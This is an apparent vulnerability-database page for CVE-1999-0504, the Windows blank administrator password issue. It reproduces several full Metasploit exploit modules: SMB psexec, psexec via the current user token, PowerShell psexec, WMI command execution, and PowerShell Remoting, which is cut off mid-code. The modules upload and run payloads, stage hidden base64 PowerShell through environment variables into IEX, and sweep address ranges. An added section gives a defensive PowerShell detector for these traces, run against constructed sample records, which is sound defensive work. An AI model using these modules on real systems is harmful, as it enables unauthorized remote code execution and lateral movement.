CVE-1999-0504
CVSS 7.5
Published: 1997-01-01 00:00:00
Revised: 2008-09-09 08:34:56

[Original] A Windows NT local user or administrator account has a default, null, blank, or missing password.


[CNNVD] Windows NT Account Encryption Vulnerability (CNNVD-199701-020)

Windows NT has a vulnerability. A local user or administrator account has a default, null, blank, or missing password.

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to modification of system files]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_nt  Microsoft Windows NT

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0504
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0504
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199701-020
(Official data source) CNNVD

- Other Links and Resources

- Vulnerability Information

Windows NT Account Encryption Vulnerability
High risk  Unknown
1997-01-01 00:00:00  2005-10-20 00:00:00
Remote
Windows NT has a vulnerability. A local user or administrator account has a default, null, blank, or missing password.

- Advisories and Patches


- Vulnerability Information (16374)

Microsoft Windows Authenticated User Code Execution (EDBID:16374)
windows remote
2010-12-02 Verified
0 metasploit
##
# $Id: psexec.rb 11204 2010-12-02 17:29:26Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


=begin
Windows XP systems that are not part of a domain default to treating all
network logons as if they were Guest. This prevents SMB relay attacks from
gaining administrative access to these systems. This setting can be found
under:

	Local Security Settings >
	 Local Policies >
	  Security Options >
	   Network Access: Sharing and security model for local accounts
=end

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Remote::SMB::Authenticated
	include Msf::Auxiliary::Report
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Windows Authenticated User Code Execution',
			'Description'    => %q{
					This module uses a valid administrator username and password (or
				password hash) to execute an arbitrary payload. This module is similar
				to the "psexec" utility provided by SysInternals. Unfortunately, this
				module is not able to clean up after itself. The service and payload
				file listed in the output will need to be manually removed after access
				has been gained. The service created by this tool uses a randomly chosen
				name and description, so the services list can become cluttered after
				repeated exploitation.
			},
			'Author'         =>
				[
					'hdm',
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11204 $',
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'process'
				},
			'References'     =>
				[
					[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
					[ 'OSVDB', '3106'],
					[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
				],
			'Payload'        =>
				{
					'Space'        => 2048,
					'DisableNops'  => true,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			# For the CVE, PsExec was first released around February or March 2001
			'DisclosureDate' => 'Jan 01 1999'
		))

		register_advanced_options(
			[
				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true])
			], self.class)
	end

	def exploit

		print_status("Connecting to the server...")
		connect()

		print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
		smb_login()

		if (not simple.client.auth_user)
			print_line(" ")
			print_error(
				"FAILED! The remote host has only provided us with Guest privileges. " +
				"Please make sure that the correct username and password have been provided. " +
				"Windows XP systems that are not part of a domain will only provide Guest privileges " +
				"to network logins by default."
			)
			print_line(" ")
			disconnect
			return
		end

		if datastore['DB_REPORT_AUTH']
			report_hash = {
				:host	=> datastore['RHOST'],
				:port   => datastore['RPORT'],
				:sname	=> 'smb',
				:user	=> datastore['SMBUser'],
				:pass	=> datastore['SMBPass'],
				:active => true
			}
			if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
				report_hash.merge!({:type => 'smb_hash'})
			else
				report_hash.merge!({:type => 'password'})
			end
			report_auth_info(report_hash)
		end

		filename = rand_text_alpha(8) + ".exe"
		servicename = rand_text_alpha(8)

		# Upload the shellcode to a file
		print_status("Uploading payload...")
		simple.connect("ADMIN$")
		fd = simple.open("\\#{filename}", 'rwct')

		exe = ''
		opts = { :servicename => servicename }
		if (datastore['PAYLOAD'].include? 'x64')
			opts.merge!({ :arch => ARCH_X64 })
		end
		exe = generate_payload_exe_service(opts)

		fd << exe
		fd.close

		print_status("Created \\#{filename}...")

		# Disconnect from the ADMIN$
		simple.disconnect("ADMIN$")

		# Connect to the IPC service
		simple.connect("IPC$")


		# Bind to the service
		handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		##
		# OpenSCManagerW()
		##

		print_status("Obtaining a service manager handle...")
		scm_handle = nil
		stubdata =
			NDR.uwstring("\\\\#{rhost}") +
			NDR.long(0) +
			NDR.long(0xF003F)
		begin
			response = dcerpc.call(0x0f, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				scm_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# CreateServiceW()
		##

		displayname = 'M' + rand_text_alpha(rand(32)+1)
		svc_handle  = nil
		svc_status  = nil

		print_status("Creating a new service (#{servicename} - \"#{displayname}\")...")
		stubdata =
			scm_handle +
			NDR.wstring(servicename) +
			NDR.uwstring(displayname) +

			NDR.long(0x0F01FF) + # Access: MAX
			NDR.long(0x00000110) + # Type: Interactive, Own process
			NDR.long(0x00000003) + # Start: Demand
			NDR.long(0x00000000) + # Errors: Ignore

			NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path
			NDR.long(0) + # LoadOrderGroup
			NDR.long(0) + # Dependencies
			NDR.long(0) + # Service Start
			NDR.long(0) + # Password
			NDR.long(0) + # Password
			NDR.long(0) + # Password
			NDR.long(0)  # Password
		begin
			response = dcerpc.call(0x0c, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
				svc_status = dcerpc.last_response.stub_data[24,4]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception
		end

		##
		# OpenServiceW
		##
		print_status("Opening service...")
		begin
			stubdata =
				scm_handle +
				NDR.wstring(servicename) +
				NDR.long(0xF01FF)

			response = dcerpc.call(0x10, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
				svc_handle = dcerpc.last_response.stub_data[0,20]
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# StartService()
		##
		print_status("Starting the service...")
		stubdata =
			svc_handle +
			NDR.long(0) +
			NDR.long(0)
		begin
			response = dcerpc.call(0x13, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
			return
		end

		##
		# DeleteService()
		##
		print_status("Removing the service...")
		stubdata =
			svc_handle
		begin
			response = dcerpc.call(0x02, stubdata)
			if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
			end
		rescue ::Exception => e
			print_error("Error: #{e}")
		end

		##
		# CloseHandle()
		##
		print_status("Closing service handle...")
		begin
			response = dcerpc.call(0x0, svc_handle)
		rescue ::Exception => e
			print_error("Error: #{e}")
		end

		begin
			print_status("Deleting \\#{filename}...")
			select(nil, nil, nil, 1.0)
			simple.connect("ADMIN$")
			simple.delete("\\#{filename}")
		rescue ::Interrupt
			raise $!
		rescue ::Exception
		end

		handler
		disconnect
	end
end


- Vulnerability Information (F115238)

Psexec Via Current User Token (PacketStormID:F115238)
2012-08-03 00:00:00
Jabra,egypt  metasploit.com
exploit,remote
CVE-1999-0504,OSVDB-3106

This Metasploit module uploads an executable file to the victim system, creates a share containing that executable, creates a remote service on each target system using a UNC path to that file, and finally starts the service(s). The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
	include Post::Windows::WindowsServices
	include Exploit::EXE
	include Post::File
	include Post::Common

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'Psexec via Current User Token',
				'Description'   => %q{
					This module uploads an executable file to the victim system, creates
					a share containing that executable, creates a remote service on each
					target system using a UNC path to that file, and finally starts the
					service(s).

					The result is similar to psexec but with the added benefit of using
					the session's current authentication token instead of having to know
					a password or hash.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [
						'egypt',
						'jabra'  # Brainstorming and help with original technique
					],
				'References'    => [
						# same as for windows/smb/psexec
						[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
						[ 'OSVDB', '3106'],
						[ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ]
					],
				'Version'       => '$Revision$',
				'Platform'      => [ 'windows' ],
				'SessionTypes'  => [ 'meterpreter' ],
				'Targets' => [ [ 'Universal', {} ] ],
				'DefaultTarget' => 0
			))

		register_options([
			OptString.new("INTERNAL_ADDRESS", [
				false,
				"Session's internal address or hostname for the victims to grab the "+
				"payload from (Default: detected)"
				]),
			OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
			OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
			OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
		])
	end

	def exploit
		name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
		display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)

		# XXX Find the domain controller

		#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
		share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
		print_status "Using #{share_host} as the internal address for victims to get the payload from"

		# Build a random name for the share and directory
		share_name = Rex::Text.rand_text_alphanumeric(8)
		drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
		share_dir = "#{drive}\\#{share_name}"

		# Create them
		print_status("Creating share #{share_dir}")
		session.fs.dir.mkdir(share_dir)
		cmd_exec("net share #{share_name}=#{share_dir}")

		# Generate an executable from the shellcode and drop it in the share
		# directory
		filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
		payload_exe = generate_payload_exe_service(
			:servicename => name,
			# XXX Ghetto
			:arch => payload.send(:pinst).arch.first
		)

		print_status("Dropping payload #{filename}")
		write_file("#{share_dir}\\#{filename}", payload_exe)

		service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"

		begin
			Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
				begin
					print_status("#{server.ljust(16)} Creating service #{name}")

					# 3 is Manual startup. Should probably have constants for this junk
					service_create(name, display_name, service_executable, 3, server)

					# If everything went well, this will create a session. If not, it
					# might be permissions issues or possibly we failed to create the
					# service.
					print_status("#{server.ljust(16)} Starting the service")
					service_start(name, server)

					print_status("#{server.ljust(16)} Deleting the service")
					service_delete(name, server)
				rescue
					print_error("Exception running payload: #{$!.class} : #{$!}")
					print_error("#{server.ljust(16)} WARNING: May have failed to clean up!")
					print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
					next
				end
			end
		ensure
			print_status("Deleting share #{share_name}")
			cmd_exec("net share #{share_name} /delete /y")
			print_status("Deleting files #{share_dir}")
			cmd_exec("cmd /c rmdir /q /s #{share_dir}")
		end

	end

end


- Vulnerability Information (F122390)

Microsoft Windows Authenticated Powershell Command Execution (PacketStormID:F122390)
2013-07-13 00:00:00
RageLtMan,Royce Davis  metasploit.com
exploit,shellcode
CVE-1999-0504,OSVDB-3106

This Metasploit module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the -encodedcommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. Since executing shellcode in .NET requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the process entirely.

# -*- coding: binary -*-

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	# Exploit mixins should be called first
	include Msf::Exploit::Remote::SMB::Psexec
	include Msf::Exploit::Powershell

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
			'Description'    => %q{
					This module uses a valid administrator username and password to execute a powershell
				payload using a similar technique to the "psexec" utility provided by SysInternals. The
				payload is encoded in base64 and executed from the commandline using the -encodedcommand
				flag. Using this method, the payload is never written to disk, and given that each payload
				is unique, is less prone to signature based detection. Since executing shellcode in .NET
				requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
				must match that of the payload. Lastly, a persist option is provided to execute the payload
				in a while loop in order to maintain a form of persistence. In the event of a sandbox
				observing PSH execution, a delay and other obfuscation may be added to avoid detection.
				In order to avoid interactive process notifications for the current user, the psh payload has
				been reduced in size and wrapped in a powershell invocation which hides the process entirely.
			},

			'Author'         => [
				'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
				'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
			],

			'License'        => MSF_LICENSE,
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'        => 8192,
					'DisableNops'  => true,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
					[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 01 1999',
			'References'     => [
				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
				[ 'OSVDB', '3106'],
				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
			]
		))
	end

	def exploit
		command = cmd_psh_payload(payload.encoded)

		if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
			print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
		end

		if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
			fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
		end

		# Try and authenticate with given credentials
		if connect
			begin
				smb_login
			rescue StandardError => autherror
				disconnect
				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
			end
			# Execute the powershell command
			print_status("#{peer} - Executing the payload...")
			begin
				return psexec(command)
			rescue StandardError => exec_command_error
				disconnect
				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
			end
		end
	end

	def peer
		return "#{rhost}:#{rport}"
	end
end


- Vulnerability Information (F123729)

Windows Management Instrumentation (WMI) Remote Command Execution (PacketStormID:F123729)
2013-10-23 00:00:00
Ben Campbell  metasploit.com
exploit,remote,tcp
windows
CVE-1999-0504,OSVDB-3106

This Metasploit module executes powershell on the remote host using the current user credentials or those supplied. Instead of using PSEXEC over TCP port 445 we use the WMIC command to start a Remote Procedure Call on TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel traffic through that session. The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash. We do not get feedback from the WMIC command so there are no indicators of success or failure. The remote host must be configured to allow remote Windows Management Instrumentation.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Management Instrumentation (WMI) Remote Command Execution',
        'Description'   => %q{
          This module executes powershell on the remote host using the current
          user credentials or those supplied. Instead of using PSEXEC over TCP
          port 445 we use the WMIC command to start a Remote Procedure Call on
          TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
          traffic through that session.

          The result is similar to psexec but with the added benefit of using
          the session's current authentication token instead of having to know
          a password or hash.

          We do not get feedback from the WMIC command so there are no
          indicators of success or failure. The remote host must be configured
          to allow remote Windows Management Instrumentation.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
          ],
        'References'    =>
          [
            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
            [ 'OSVDB', '3106'],
            [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
          ],
        'DefaultOptions' =>
            {
                'EXITFUNC' => 'thread',
                'WfsDelay' => '15',
            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ],
        'Targets'	=>
        [
            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
        'DefaultTarget' => 0
      ))

    register_options([
      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
      # Move this out of advanced
      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
    ])
  end

  def exploit
    if datastore['SMBUser'] and datastore['SMBPass'].nil?
      fail_with(Failure::BadConfig, "Need both username and password set.")
    end

    Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
      # TODO: CHECK WMIC Access by reading the clipboard?
      # TODO: wmic /output:clipboard
      # TODO: Needs to be meterpreter ext side due to threading

      # Get the PSH Payload and split it into bitesize chunks
      # 1024 appears to be the max value allowed in env vars
      psh = cmd_psh_payload(payload.encoded).gsub("\r\n","")
      psh = psh[psh.index("$si")..psh.length-1]
      chunks = split_code(psh, 1024)

      begin
        print_status("[#{server}] Storing payload in environment variables")
        env_name = rand_text_alpha(rand(3)+3)
        env_vars = []
        0.upto(chunks.length-1) do |i|
          env_vars << "#{env_name}#{i}"
          c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
          wmic_command(server, c)
        end

        x = rand_text_alpha(rand(3)+3)
        exec_cmd = "powershell.exe -nop -w hidden -c $#{x} = ''"
        env_vars.each do |env|
          exec_cmd << "+$env:#{env}"
        end
        exec_cmd << ";IEX $#{x};"

        print_status("[#{server}] Executing payload")
        wmic_command(server, exec_cmd)

        print_status("[#{server}] Cleaning up environment variables")
        env_vars.each do |env|
          cleanup_cmd = "cmd /c REG delete \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
          wmic_command(server, cleanup_cmd)
        end
      rescue Rex::Post::Meterpreter::RequestError => e
        print_error("[#{server}] Error moving on... #{e}")
        next
      ensure
        select(nil,nil,nil,2)
      end
    end
  end

  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
    userpass = ""

    unless user.nil?
      if domain.nil?
        userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
      else
        userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
      end
    end

    return userpass
  end

  def wmic_command(server, cmd)
    wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
    vprint_status("[#{server}] #{wcmd}")

    # We dont use cmd_exec as WMIC cannot be Channelized
    ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
    select(nil,nil,nil,0.1)
  end

  def split_code(psh, chunk_size)
    array = []
    idx = 0
    while (idx < psh.length)
      array << psh[idx, chunk_size]
      idx += chunk_size
    end
    return array
  end

end
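
Detection for the traces these modules leave behind, as an added example: the PowerShell below is not part of any Metasploit module on this page or of Rapid7's code. It scores a System-log event 7045 record ("A service was installed in the system", whose EventData fields are ServiceName, ImagePath and AccountName) against the service shape windows/smb/psexec registers (an 8-letter name and a binary at %SYSTEMROOT%\<8 letters>.exe) and against the UNC image path used by the current-user-token variant, and it scores process command lines (Security event 4688 or Sysmon event 1) against the WMIC `process call create`, `SETX /m`, hidden `-nop` PowerShell, `$env:` reassembly into IEX and `-encodedcommand` shapes that the WMI and PowerShell psexec modules use. Every event record and command line in the block is a constructed sample, and the rule names and thresholds are this example's own choices.

```powershell
# Added example, not part of the Metasploit modules above. Sample records are constructed.

function Test-SuspiciousServiceInstall {
    # Input: one System-log event 7045 as an object carrying the event's EventData
    # fields ServiceName, ImagePath and AccountName.
    param([Parameter(Mandatory)][pscustomobject]$Record)

    $strong = @(); $weak = @()
    # windows/smb/psexec writes %SYSTEMROOT%\<8 random letters>.exe and registers it as a service
    if ($Record.ImagePath -match '^%SYSTEMROOT%\\[A-Za-z]{8}\.exe$') {
        $strong += 'image is a random-looking exe directly under %SYSTEMROOT%'
    }
    # the current-user-token variant points the service at a UNC share on another host
    if ($Record.ImagePath -match '^\\\\[^\\]+\\[^\\]+\\[^\\]+\.exe$') {
        $strong += 'service image loaded from a UNC path'
    }
    # an 8-letter name on its own is weak evidence (Netlogon is 8 letters too)
    if ($Record.ServiceName -match '^[A-Za-z]{8}$') { $weak += 'service name is 8 random-looking letters' }
    if ($Record.AccountName -eq 'LocalSystem')      { $weak += 'runs as LocalSystem' }

    [pscustomobject]@{
        ServiceName = $Record.ServiceName
        ImagePath   = $Record.ImagePath
        Suspicious  = ($strong.Count -gt 0)          # weak signals only add context
        Reasons     = ($strong + $weak) -join '; '
    }
}

function Test-SuspiciousCommandLine {
    # Input: a process command line, e.g. from Security event 4688 or Sysmon event 1.
    param([Parameter(Mandatory)][string]$CommandLine)

    $hits = @()
    if ($CommandLine -match '\bwmic\b.*/node:\S+.*process\s+call\s+create') { $hits += 'remote process creation via WMIC' }
    if ($CommandLine -match '\bSETX\b.*\s/m\b')                              { $hits += 'machine-wide environment variable set with SETX /m' }
    if ($CommandLine -match 'powershell(\.exe)?\s.*-(nop|noprofile)\b' -and
        $CommandLine -match '-w(indowstyle)?\s+hidden\b')                     { $hits += 'hidden, profile-less PowerShell' }
    if ($CommandLine -match '\$env:\w+.*\b(IEX|Invoke-Expression)\b')         { $hits += 'payload reassembled from environment variables and passed to IEX' }
    if ($CommandLine -match '-(enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}')    { $hits += 'base64 -encodedcommand payload' }

    [pscustomobject]@{
        CommandLine = $CommandLine
        Suspicious  = ($hits.Count -ge 2)   # a single marker is common in legitimate admin scripts
        Reasons     = $hits -join '; '
    }
}

# Constructed 7045-style records: two patterned after the modules above, one ordinary installer
$serviceEvents = @(
    [pscustomobject]@{ ServiceName = 'QmxTvBnP';    ImagePath = '%SYSTEMROOT%\KdPwRzHq.exe';                AccountName = 'LocalSystem' }
    [pscustomobject]@{ ServiceName = 'aB3dE6fG7h';  ImagePath = '\\192.0.2.5\k7Hd2sLp\Qw9eRtYu.exe';        AccountName = 'LocalSystem' }
    [pscustomobject]@{ ServiceName = 'VendorAgent'; ImagePath = '"C:\Program Files\Vendor\agent.exe" /svc'; AccountName = 'NT AUTHORITY\LocalService' }
)
# Constructed command lines: the WMIC/SETX and env-var/IEX shapes from the WMI module, the
# -encodedcommand shape from the PowerShell psexec module, and two ordinary ones
$commandLines = @(
    'wmic /node:192.0.2.10 process call create "cmd /c SETX xyz0 \"<chunk>\" /m"',
    'powershell.exe -nop -w hidden -c $abc = ''''+$env:xyz0+$env:xyz1;IEX $abc;',
    'powershell.exe -nop -w hidden -encodedcommand QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQA=',
    'powershell.exe -NoProfile -Command Get-Service',
    '"C:\Windows\System32\svchost.exe" -k netsvcs'
)

$serviceEvents | ForEach-Object { Test-SuspiciousServiceInstall $_ } | Format-Table -AutoSize -Wrap
$commandLines  | ForEach-Object { Test-SuspiciousCommandLine  $_ } | Format-Table -AutoSize -Wrap
```

On a live host the same functions take their input from `Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}` (the ServiceName, ImagePath and AccountName values sit in the event's `Properties` collection) and from the command-line field of 4688 or Sysmon process-creation events; the two-marker threshold for command lines keeps a lone `-NoProfile` or a legitimate `SETX` from paging anyone.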

    

- Vulnerability Information (F130975)

Powershell Remoting Remote Command Execution (PacketStormID:F130975)
2015-03-24 00:00:00
Ben Campbell  metasploit.com
exploit,tcp
CVE-1999-0504,OSVDB-3106

This Metasploit module uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
          'Name'          => 'Powershell Remoting Remote Command Execution',
          'Description'   => %q{
            Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
          If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
          use a HOSTFILE to supply a list of known hostnames.
          },
          'License'       => MSF_LICENSE,
          'Author'        => [ 'Ben Campbell' ],
          'References'    =>
            [
              [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
              [ 'OSVDB', '3106']
            ],
          'DefaultOptions' =>
              {
                'EXITFUNC' => 'thread'
              },
          'DisclosureDate' => 'Jan 01 1999',
          'Platform'      => [ 'win' ],
          'SessionTypes'  => [ 'meterpreter', 'shell' ],
          'Targets' =>
          [
            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
          ],
          'DefaultTarget' => 0
      ))

    register_options([
      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
      OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
      # Move this out of advanced
      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
      OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ])
    ])

    register_advanced_options(
      [
        OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
      ], self.class)
  end

  def exploit
    if !datastore['ExitOnSession'] && !job_id
      fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
    end

    unless datastore['RHOSTS'] || datastore['HOSTFILE']
      fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
    end

    if datastore['SMBUser'] && datastore['SMBPass'].nil?
      fail_with(Failure::BadConfig, "Need both username and password set.")
    end

    if datastore['RHOSTS']
      ip_list = "$iplist="
      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
        ip_list << "'#{ip}',"
      end

      # Remove trailing comma...
      ip_list = ip_list[0..-2]
      ip_list << ";"
    end

    known_hosts = ""
    if datastore['HOSTFILE']
      ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
        hostname.strip!
        known_hosts << "'#{hostname}'," unless hostname.blank?
      end
      known_hosts = known_hosts[0..-2]
    end

    command = cmd_psh_payload(payload.encoded,
                              payload_instance.arch.first,
                              encode_final_payload: true,
                              remove_comspec: true)

    ps = <<EOF
#{generate_credentials}
$ResultList=@(#{known_hosts});
#{ip_list}
foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
EOF

    if datastore['SMBUser']
      ps << " -Credential $creds"
    end

    # If the host process terminates too quickly the jobs will die
    # before they spawn in a new process.
    ps << ";Sleep 20;"
    ps.gsub!("\n", "")

    command = generate_psh_command_line(
      noprofile: true,
      windowstyle: 'hidden',
      command: ps
    )

    print_status("Executing command...")
    begin
      cmd_exec(command)
    rescue Rex::TimeoutError
    end

    stime = Time.now.to_f
    loop do
